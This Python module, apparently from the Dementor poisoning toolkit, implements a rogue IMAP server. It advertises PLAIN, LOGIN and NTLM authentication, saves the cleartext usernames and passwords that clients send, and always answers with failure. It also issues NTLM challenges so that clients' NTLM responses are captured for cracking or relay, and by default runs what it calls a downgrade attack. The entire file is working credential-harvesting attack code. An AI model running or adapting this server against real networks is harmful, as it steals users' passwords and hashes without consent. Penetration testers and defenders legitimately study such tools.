# Copyright (c) 2025-Present MatrixEditor
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# - [MS-OXIMAP]:
#    https://learn.microsoft.com/en-us/openspecs/exchange_server_protocols/ms-oximap4/b0f9d5f1-ac42-4b27-a874-0c3bf9e3b9b5
# - RFC-9051:
#    https://www.ietf.org/rfc/rfc9051.html
import base64
import binascii
import shlex

from impacket import ntlm

from dementor.protocols.ntlm import (
    NTLM_AUTH_CreateChallenge,
    NTLM_report_auth,
    NTLM_split_fqdn,
    ATTR_NTLM_CHALLENGE,
    ATTR_NTLM_ESS,
)
from dementor.servers import (
    ServerThread,
    ThreadingTCPServer,
    BaseProtoHandler,
    create_tls_context,
)
from dementor.logger import ProtocolLogger
from dementor.database import _CLEARTEXT
from dementor.config.toml import (
    TomlConfig,
    Attribute as A,
)
from dementor.config.attr import ATTR_TLS, ATTR_CERT, ATTR_KEY
from dementor.config.util import get_value


def apply_config(session):
    """Populate ``session.imap_config`` with one config object per server entry.

    The raw entries are looked up with ``get_value("IMAP", "Server")`` (an
    empty list is passed as the default) and each one is wrapped in an
    :class:`IMAPServerConfig`.
    """
    raw_servers = get_value("IMAP", "Server", default=[])
    session.imap_config = [IMAPServerConfig(entry) for entry in raw_servers]


def create_server_threads(session):
    """Return one :class:`ServerThread` for every configured IMAP server.

    An empty list is returned when ``session.imap_enabled`` is false. Each
    thread is bound to ``session.bind_address`` and the port taken from the
    corresponding server configuration.
    """
    if not session.imap_enabled:
        return []

    threads = []
    for server_config in session.imap_config:
        address = (session.bind_address, server_config.imap_port)
        threads.append(
            ServerThread(
                session,
                IMAPServer,
                server_config=server_config,
                server_address=address,
            )
        )
    return threads


# Capability atoms used as the default for the "Capabilities" setting of
# IMAPServerConfig; they are listed in the CAPABILITY response.
IMAP_CAPABILITIES = [
    # NOTE: STARTTLS support is currently not available
    # "STARTTLS",
    "IMAP4rev2",
    "IMAP4rev1",
]

# Default for the "AuthMechanisms" setting; each entry is advertised as
# "AUTH=<name>" in the CAPABILITY response.
IMAP_AUTH_MECHS = ["PLAIN", "LOGIN", "NTLM"]


class IMAPServerConfig(TomlConfig):
    """Settings of a single IMAP server instance.

    NOTE(review): each ``A(...)`` entry presumably binds an attribute name to a
    configuration key plus an optional default; the exact semantics live in
    ``TomlConfig`` / ``Attribute`` and should be confirmed there.
    """
    _section_ = "IMAP"
    _fields_ = [
        # Port the server listens on (used for the server address and logging).
        A("imap_port", "Port"),
        # Name handed to NTLM_split_fqdn when building the NTLM challenge.
        A("imap_fqdn", "FQDN", "Dementor", section_local=False),
        # Capability atoms listed in the CAPABILITY response.
        A("imap_caps", "Capabilities", IMAP_CAPABILITIES),
        # Mechanisms advertised as "AUTH=<name>" in the CAPABILITY response.
        A("imap_auth_mechanisms", "AuthMechanisms", IMAP_AUTH_MECHS),
        # Text of the untagged OK greeting sent when a client connects.
        A("imap_banner", "Banner", "IMAP4rev2 service ready"),
        # When true, NTLM authentication is answered with NO after the
        # credentials were reported (see IMAPHandler.auth_NTLM).
        A("imap_downgrade", "Downgrade", True),
        ATTR_NTLM_CHALLENGE,
        ATTR_NTLM_ESS,
        ATTR_KEY,
        ATTR_CERT,
        ATTR_TLS,
    ]


class StopHandler(Exception):
    """Raised by command handlers to make the command loop stop reading."""


class IMAPHandler(BaseProtoHandler):
    def __init__(self, config, server_config, request, client_address, server) -> None:
        """Remember the per-server settings, then initialise the base handler.

        :param config: forwarded to the base handler.
        :param server_config: settings of the IMAP server that accepted the
            connection (banner, port, capabilities, NTLM options, ...).
        :param request: forwarded to the base handler.
        :param client_address: forwarded to the base handler.
        :param server: forwarded to the base handler.
        """
        self.server_config = server_config
        # Tag of the command currently being answered; None until the first
        # command line has been parsed.
        self.seq_id = None
        # NOTE(review): the attributes above are assigned before the base
        # initializer runs - presumably because it already starts handling
        # the connection; confirm against BaseProtoHandler.
        super().__init__(config, request, client_address, server)

    def proto_logger(self) -> ProtocolLogger:
        """Build the logger for this connection, tagged with protocol, host and port."""
        log_extra = {
            "protocol": "IMAP",
            "protocol_color": "honeydew2",
            "host": self.client_host,
            "port": self.server_config.imap_port,
        }
        return ProtocolLogger(extra=log_extra)

    def _push(self, msg: str, seq=True) -> None:
        line = str(msg)
        #  2.2.1. Client Protocol Sender and Server Protocol Receiver
        # Each client command is prefixed with an identifier (typically a
        # short alphanumeric string, e.g., A0001, A0002, etc.) called a
        # "tag". A different tag is generated by the client for each command.
        if seq and self.seq_id:
            line = f"{self.seq_id} {line}"
        elif not seq:
            # 2.2.2. Server Protocol Sender and Client Protocol Receiver
            # Data transmitted by the server to the client and status responses
            # that do not indicate command completion are prefixed with the
            # token "*" and are called untagged responses.
            line = f"* {line}"
        self._write_line(line)

    def _write_line(self, msg: str) -> None:
        self.logger.debug(f"(imap) S: {msg!r}")
        self.send(f"{msg}\r\n".encode("utf-8", "strict"))

    #  There are three possible server completion responses:
    #   - OK (indicating success),
    #   - NO (indicating failure), or
    #   - BAD (indicating a protocol error such as unrecognized command or
    #          command syntax error).
    def ok(self, msg: str, seq=True):
        self._push(f"OK {msg}", seq)

    def no(self, msg: str, seq=True):
        self._push(f"NO {msg}", seq)

    def bad(self, msg: str, seq=True):
        self._push(f"BAD {msg}", seq)

    # NOTE: Section 2.2.2 states:
    # Servers SHOULD strictly enforce the syntax outlined in this specification.
    # Any client command with a protocol syntax error, including (but not limited
    # to) missing or extraneous spaces or arguments, SHOULD be rejected and the
    # client given a BAD server completion response.
    #
    # - We won't do that as this server just accepts the authorization

    def unquoted(self, data: str) -> str:
        # A quoted string is a sequence of zero or more Unicode characters, excluding
        # CR and LF, encoded in UTF-8, with double quote (<">) characters at each end.
        return data.removeprefix('"').removesuffix('"')

    def challenge_auth(
        self,
        token: bytes | None = None,
        decode: bool = False,
        prefix: str | None = None,
    ) -> bytes | str:
        #  6.2.2. AUTHENTICATE Command
        # The authentication protocol exchange consists of a series of server challenges
        # and client responses that are specific to the authentication mechanism. A server
        # challenge consists of a command continuation request response with the "+" token
        # followed by a base64-encoded (see Section 4 of [RFC4648]) string.
        line = prefix or "+"
        if token:
            line = f"{line} {base64.b64encode(token).decode()}"

        self._write_line(line)
        # he client response consists of a single line consisting of a base64-encoded string.
        # If the client wishes to cancel an authentication exchange, it issues a line consisting
        # of a single "*"
        resp = self.rfile.readline(1024).strip()
        self.logger.debug(f"(imap) C: {resp!r}")
        if resp == b"*":
            self.bad("Authentication canceled")
            raise StopHandler

        try:
            # If the server receives such a response, or if it receives an invalid base64 string
            # (e.g., characters outside the base64 alphabet or non-terminal "="), it MUST reject
            # the AUTHENTICATE command by sending a tagged BAD response.
            data = base64.b64decode(resp)
        except binascii.Error:
            self.bad("Invalid base64 string")
            raise StopHandler

        return data if not decode else data.decode("utf-8", errors="replace")

    def send_greeting(self):
        # 7.1.1.  OK Response
        # An untagged response can be used as a greeting at connection
        # startup.
        self.ok(self.server_config.imap_banner, seq=False)

    def handle_data(self, data, transport) -> None:
        #  The initial state is identified in the server greeting.
        self.send_greeting()
        self.request.settimeout(2)
        self.rfile = transport.makefile("rb")

        # 3.1. Not Authenticated State
        # In the not authenticated state, the client MUST supply authentication credentials before
        # most commands will be permitted. This state is entered when a connection starts unless
        # the connection has been pre-authenticated.
        while line := self.recv_line(1024):
            try:
                tag, cmd, *args = shlex.split(line)
                self.seq_id = tag
            except ValueError:
                self.logger.debug(f"(imap) Unknown command: {line!r}")
                self.bad("Invalid command")
                continue

            method = getattr(self, f"do_{cmd.upper()}", None)
            if method:
                try:
                    method(args)
                except StopHandler:
                    break
            else:
                self.logger.debug(f"(imap) Unknown command: {line!r}")
                #  7.1.5. BYE Response
                self._push("BYE Unknown command", seq=False)
                break

    def recv_line(self, size: int) -> str | None:
        data = self.rfile.readline(size)
        if data:
            text = data.decode("utf-8", errors="replace").strip()
            self.logger.debug(f"(imap) C: {text!r}")
            return text

    # implementation
    #  7.2.2. CAPABILITY Response
    def do_CAPABILITY(self, args):
        # The CAPABILITY response occurs as a result of a CAPABILITY command. The
        # capability listing contains a space-separated listing of capability names
        # that the server supports. The capability listing MUST include the atom
        # "IMAP4rev2", but note that it doesn't have to be the first capability listed.
        self.logger.display(f"Capabilities requested from {self.client_host}")
        capabilities = ["CAPABILITY"] + self.server_config.imap_caps
        capabilities.extend(
            map(lambda x: f"AUTH={x}", self.server_config.imap_auth_mechanisms)
        )
        self._push(" ".join(capabilities), seq=False)
        self.ok("CAPABILITY completed")
        pass

    #  6.1.2. NOOP Command
    def do_NOOP(self, args):
        # The NOOP command always succeeds. It does nothing.
        self.ok("NOOP completed")

    #  6.4.1. CLOSE Command
    def do_CLOSE(self, args):
        self.ok("CLOSE completed")
        raise StopHandler

    #  6.2.3. LOGIN Command
    def do_LOGIN(self, args: str):
        if len(args) != 2:
            return self.bad("Invalid number of arguments")

        username, password = args
        self.config.db.add_auth(
            client=self.client_address,
            username=self.unquoted(username),
            password=self.unquoted(password),
            logger=self.logger,
            credtype=_CLEARTEXT,
        )
        self.no("LOGIN failed")

    #  6.2.2. AUTHENTICATE Command
    def do_AUTHENTICATE(self, args):
        if len(args) < 1:
            return self.bad("Invalid number of arguments")

        auth_mechanism = self.unquoted(args[0].upper())
        method = getattr(self, f"auth_{auth_mechanism}", None)
        if method:
            method(*args[1:])
        else:
            self.bad("Unknown authentication mechanism")

    #  6.2.1. STARTTLS Command
    def do_STARTTLS(self, args):
        # NO - TLS negotiation can't be initiated, due to server configuration error
        self.no("STARTTLS not supported")

    # [MS-OXIMAP] 2.2.1 IMAP4 NTLM
    def auth_NTLM(self, initial_response=None):
        # IMAP4_AUTHENTICATE_NTLM_Supported_Response
        if not initial_response:
            token = self.challenge_auth()
        else:
            try:
                # When decoding the base64 data in the initial response, decoding
                # errors MUST be treated as in any normal SASL client response,
                # i.e., with a tagged BAD response.
                token = base64.b64decode(initial_response)
            except binascii.Error:
                return self.bad("Invalid Base64 encoding")

        # IMAP4_AUTHENTICATE_NTLM_Blob_Command
        negotiate = ntlm.NTLMAuthNegotiate()
        try:
            negotiate.fromString(token)
        except Exception as e:
            self.logger.debug(f"NTLM negotiation failed: {e}")
            return self.bad("NTLM negotiation failed")

        # IMAP4_AUTHENTICATE_NTLM_Blob_Response
        challenge = NTLM_AUTH_CreateChallenge(
            negotiate,
            *NTLM_split_fqdn(self.server_config.imap_fqdn),
            challenge=self.server_config.ntlm_challenge,
            disable_ess=not self.server_config.ntlm_ess,
        )

        # IMAP4_AUTHENTICATE_NTLM_Blob_Command
        token = self.challenge_auth(challenge.getData())
        auth_message = ntlm.NTLMAuthChallengeResponse()
        try:
            auth_message.fromString(token)
        except Exception as e:
            self.logger.debug(f"NTLM authentication failed: {e}")
            return self.bad("NTLM authentication failed")

        NTLM_report_auth(
            auth_message,
            challenge=self.server_config.ntlm_challenge,
            client=self.client_address,
            logger=self.logger,
            session=self.config,
        )

        if self.server_config.imap_downgrade:
            self.logger.display(f"Performing downgrade attack on {self.client_host}")
            return self.no("Authentication failed")

        self.ok("AUTHENTICATE completed")

    def auth_PLAIN(self, initial_response=None):
        if initial_response:
            login_and_password = base64.b64decode(initial_response)
        else:
            login_and_password = self.challenge_auth()

        # 2.  PLAIN SASL Mechanism
        try:
            _, login, password = login_and_password.split(b"\x00")
        except ValueError:
            return self.bad("Invalidlogin data")

        self.config.db.add_auth(
            client=self.client_address,
            username=login.decode(errors="replace"),
            password=password.decode(errors="replace"),
            logger=self.logger,
            credtype=_CLEARTEXT,
        )
        self.no("LOGIN failed")

    def auth_LOGIN(self):
        username = self.challenge_auth(decode=True)
        password = self.challenge_auth(decode=True)
        self.config.db.add_auth(
            client=self.client_address,
            username=username,
            password=password,
            logger=self.logger,
            credtype=_CLEARTEXT,
        )
        self.no("LOGIN failed")


class IMAPServer(ThreadingTCPServer):
    """Threaded TCP server that serves each connection with :class:`IMAPHandler`.

    When ``create_tls_context`` returns a context for the server configuration,
    the listening socket is wrapped with it.
    """

    default_port = 143
    default_handler_class = IMAPHandler
    service_name = "IMAP"

    def __init__(
        self,
        config,
        server_address=None,
        RequestHandlerClass: type | None = None,
        server_config: IMAPServerConfig | None = None,
    ) -> None:
        """Store *server_config*, initialise the base server and set up TLS.

        :param config: forwarded to the base server.
        :param server_address: forwarded to the base server.
        :param RequestHandlerClass: forwarded to the base server.
        :param server_config: settings of this IMAP server instance.
        """
        # Assigned before the base initializer runs, as in the handler class.
        self.server_config = server_config
        super().__init__(config, server_address, RequestHandlerClass)

        tls_context = create_tls_context(self.server_config, self)
        self.ssl_context = tls_context
        if tls_context:
            self.socket = tls_context.wrap_socket(self.socket, server_side=True)

    def finish_request(self, request, client_address) -> None:
        """Instantiate the request handler, additionally passing the server config."""
        handler_cls = self.RequestHandlerClass
        handler_cls(self.config, self.server_config, request, client_address, self)
